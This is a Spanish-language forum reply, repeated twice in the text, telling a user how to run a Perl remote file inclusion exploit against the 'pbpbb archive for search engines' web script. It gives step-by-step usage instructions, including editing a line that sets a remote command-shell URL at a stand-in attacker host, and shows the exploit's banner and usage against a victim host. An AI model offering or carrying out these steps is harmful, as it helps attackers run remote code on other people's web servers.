de todos modos, este exploit esta escrito en perl, como se puede ver en la primera linea del exploit.
#!/usr/bin/perl
El lenguaje perl, no necesita compilación, pero si requiere tener un interprete de perl, en linux suele venir instalado con la propia distribución, en windows tienes que instalarlo aparte, pero, eso si, es gratis.
para utilizar este exploit solo tienes que:
0.- tener instalado un interprete de perl.
1.- copia el exploit en un archivo de texto, pero sin formato, tipo vim, gedit, o notepad para windows
2.- modificas la linea 25 $cmdshell="http://attacker.com/cmd.txt"; a tu gusto y lo guardas.
3.- lo ejecutas y sigues las indicaciones del exploit
OeX:/home/oex# perl exploit.perl
################################################# # # # pbpbb archive for search engines Remote File Include Vulnerability # # Bug found By : Ashiyane Corporation # # Email: nima salehi nima[at]ashiyane.ir # # Web Site : www.Ashiyane.ir # # # #################################################
Usage: Ashiyane.pl [host] [path] EX : Ashiyane.pl www.victim.com /path/
Compilar exploits
hola www.ralagofi0,com,
En breve intentare hacer un pequeño manual de como compilar un exploit, ya lo publicare en la sección de técnicas de hacking, cuando este listo, gracias por la idea
de todos modos, este exploit esta escrito en perl, como se puede ver en la primera linea del exploit.
#!/usr/bin/perlEl lenguaje perl, no necesita compilación, pero si requiere tener un interprete de perl, en linux suele venir instalado con la propia distribución, en windows tienes que instalarlo aparte, pero, eso si, es gratis.
para utilizar este exploit solo tienes que:
0.- tener instalado un interprete de perl.
1.- copia el exploit en un archivo de texto, pero sin formato, tipo vim, gedit, o notepad para windows
2.- modificas la linea 25
$cmdshell="http://attacker.com/cmd.txt";a tu gusto y lo guardas.3.- lo ejecutas y sigues las indicaciones del exploit
OeX:/home/oex# perl exploit.perl
#################################################
# #
# pbpbb archive for search engines Remote File Include Vulnerability #
# Bug found By : Ashiyane Corporation #
# Email: nima salehi nima[at]ashiyane.ir #
# Web Site : www.Ashiyane.ir #
# #
#################################################
Usage: Ashiyane.pl [host] [path]
EX : Ashiyane.pl www.victim.com /path/
si tienes dudas puede preguntar en el foro
pd hazte usuario q es un minuto
OeX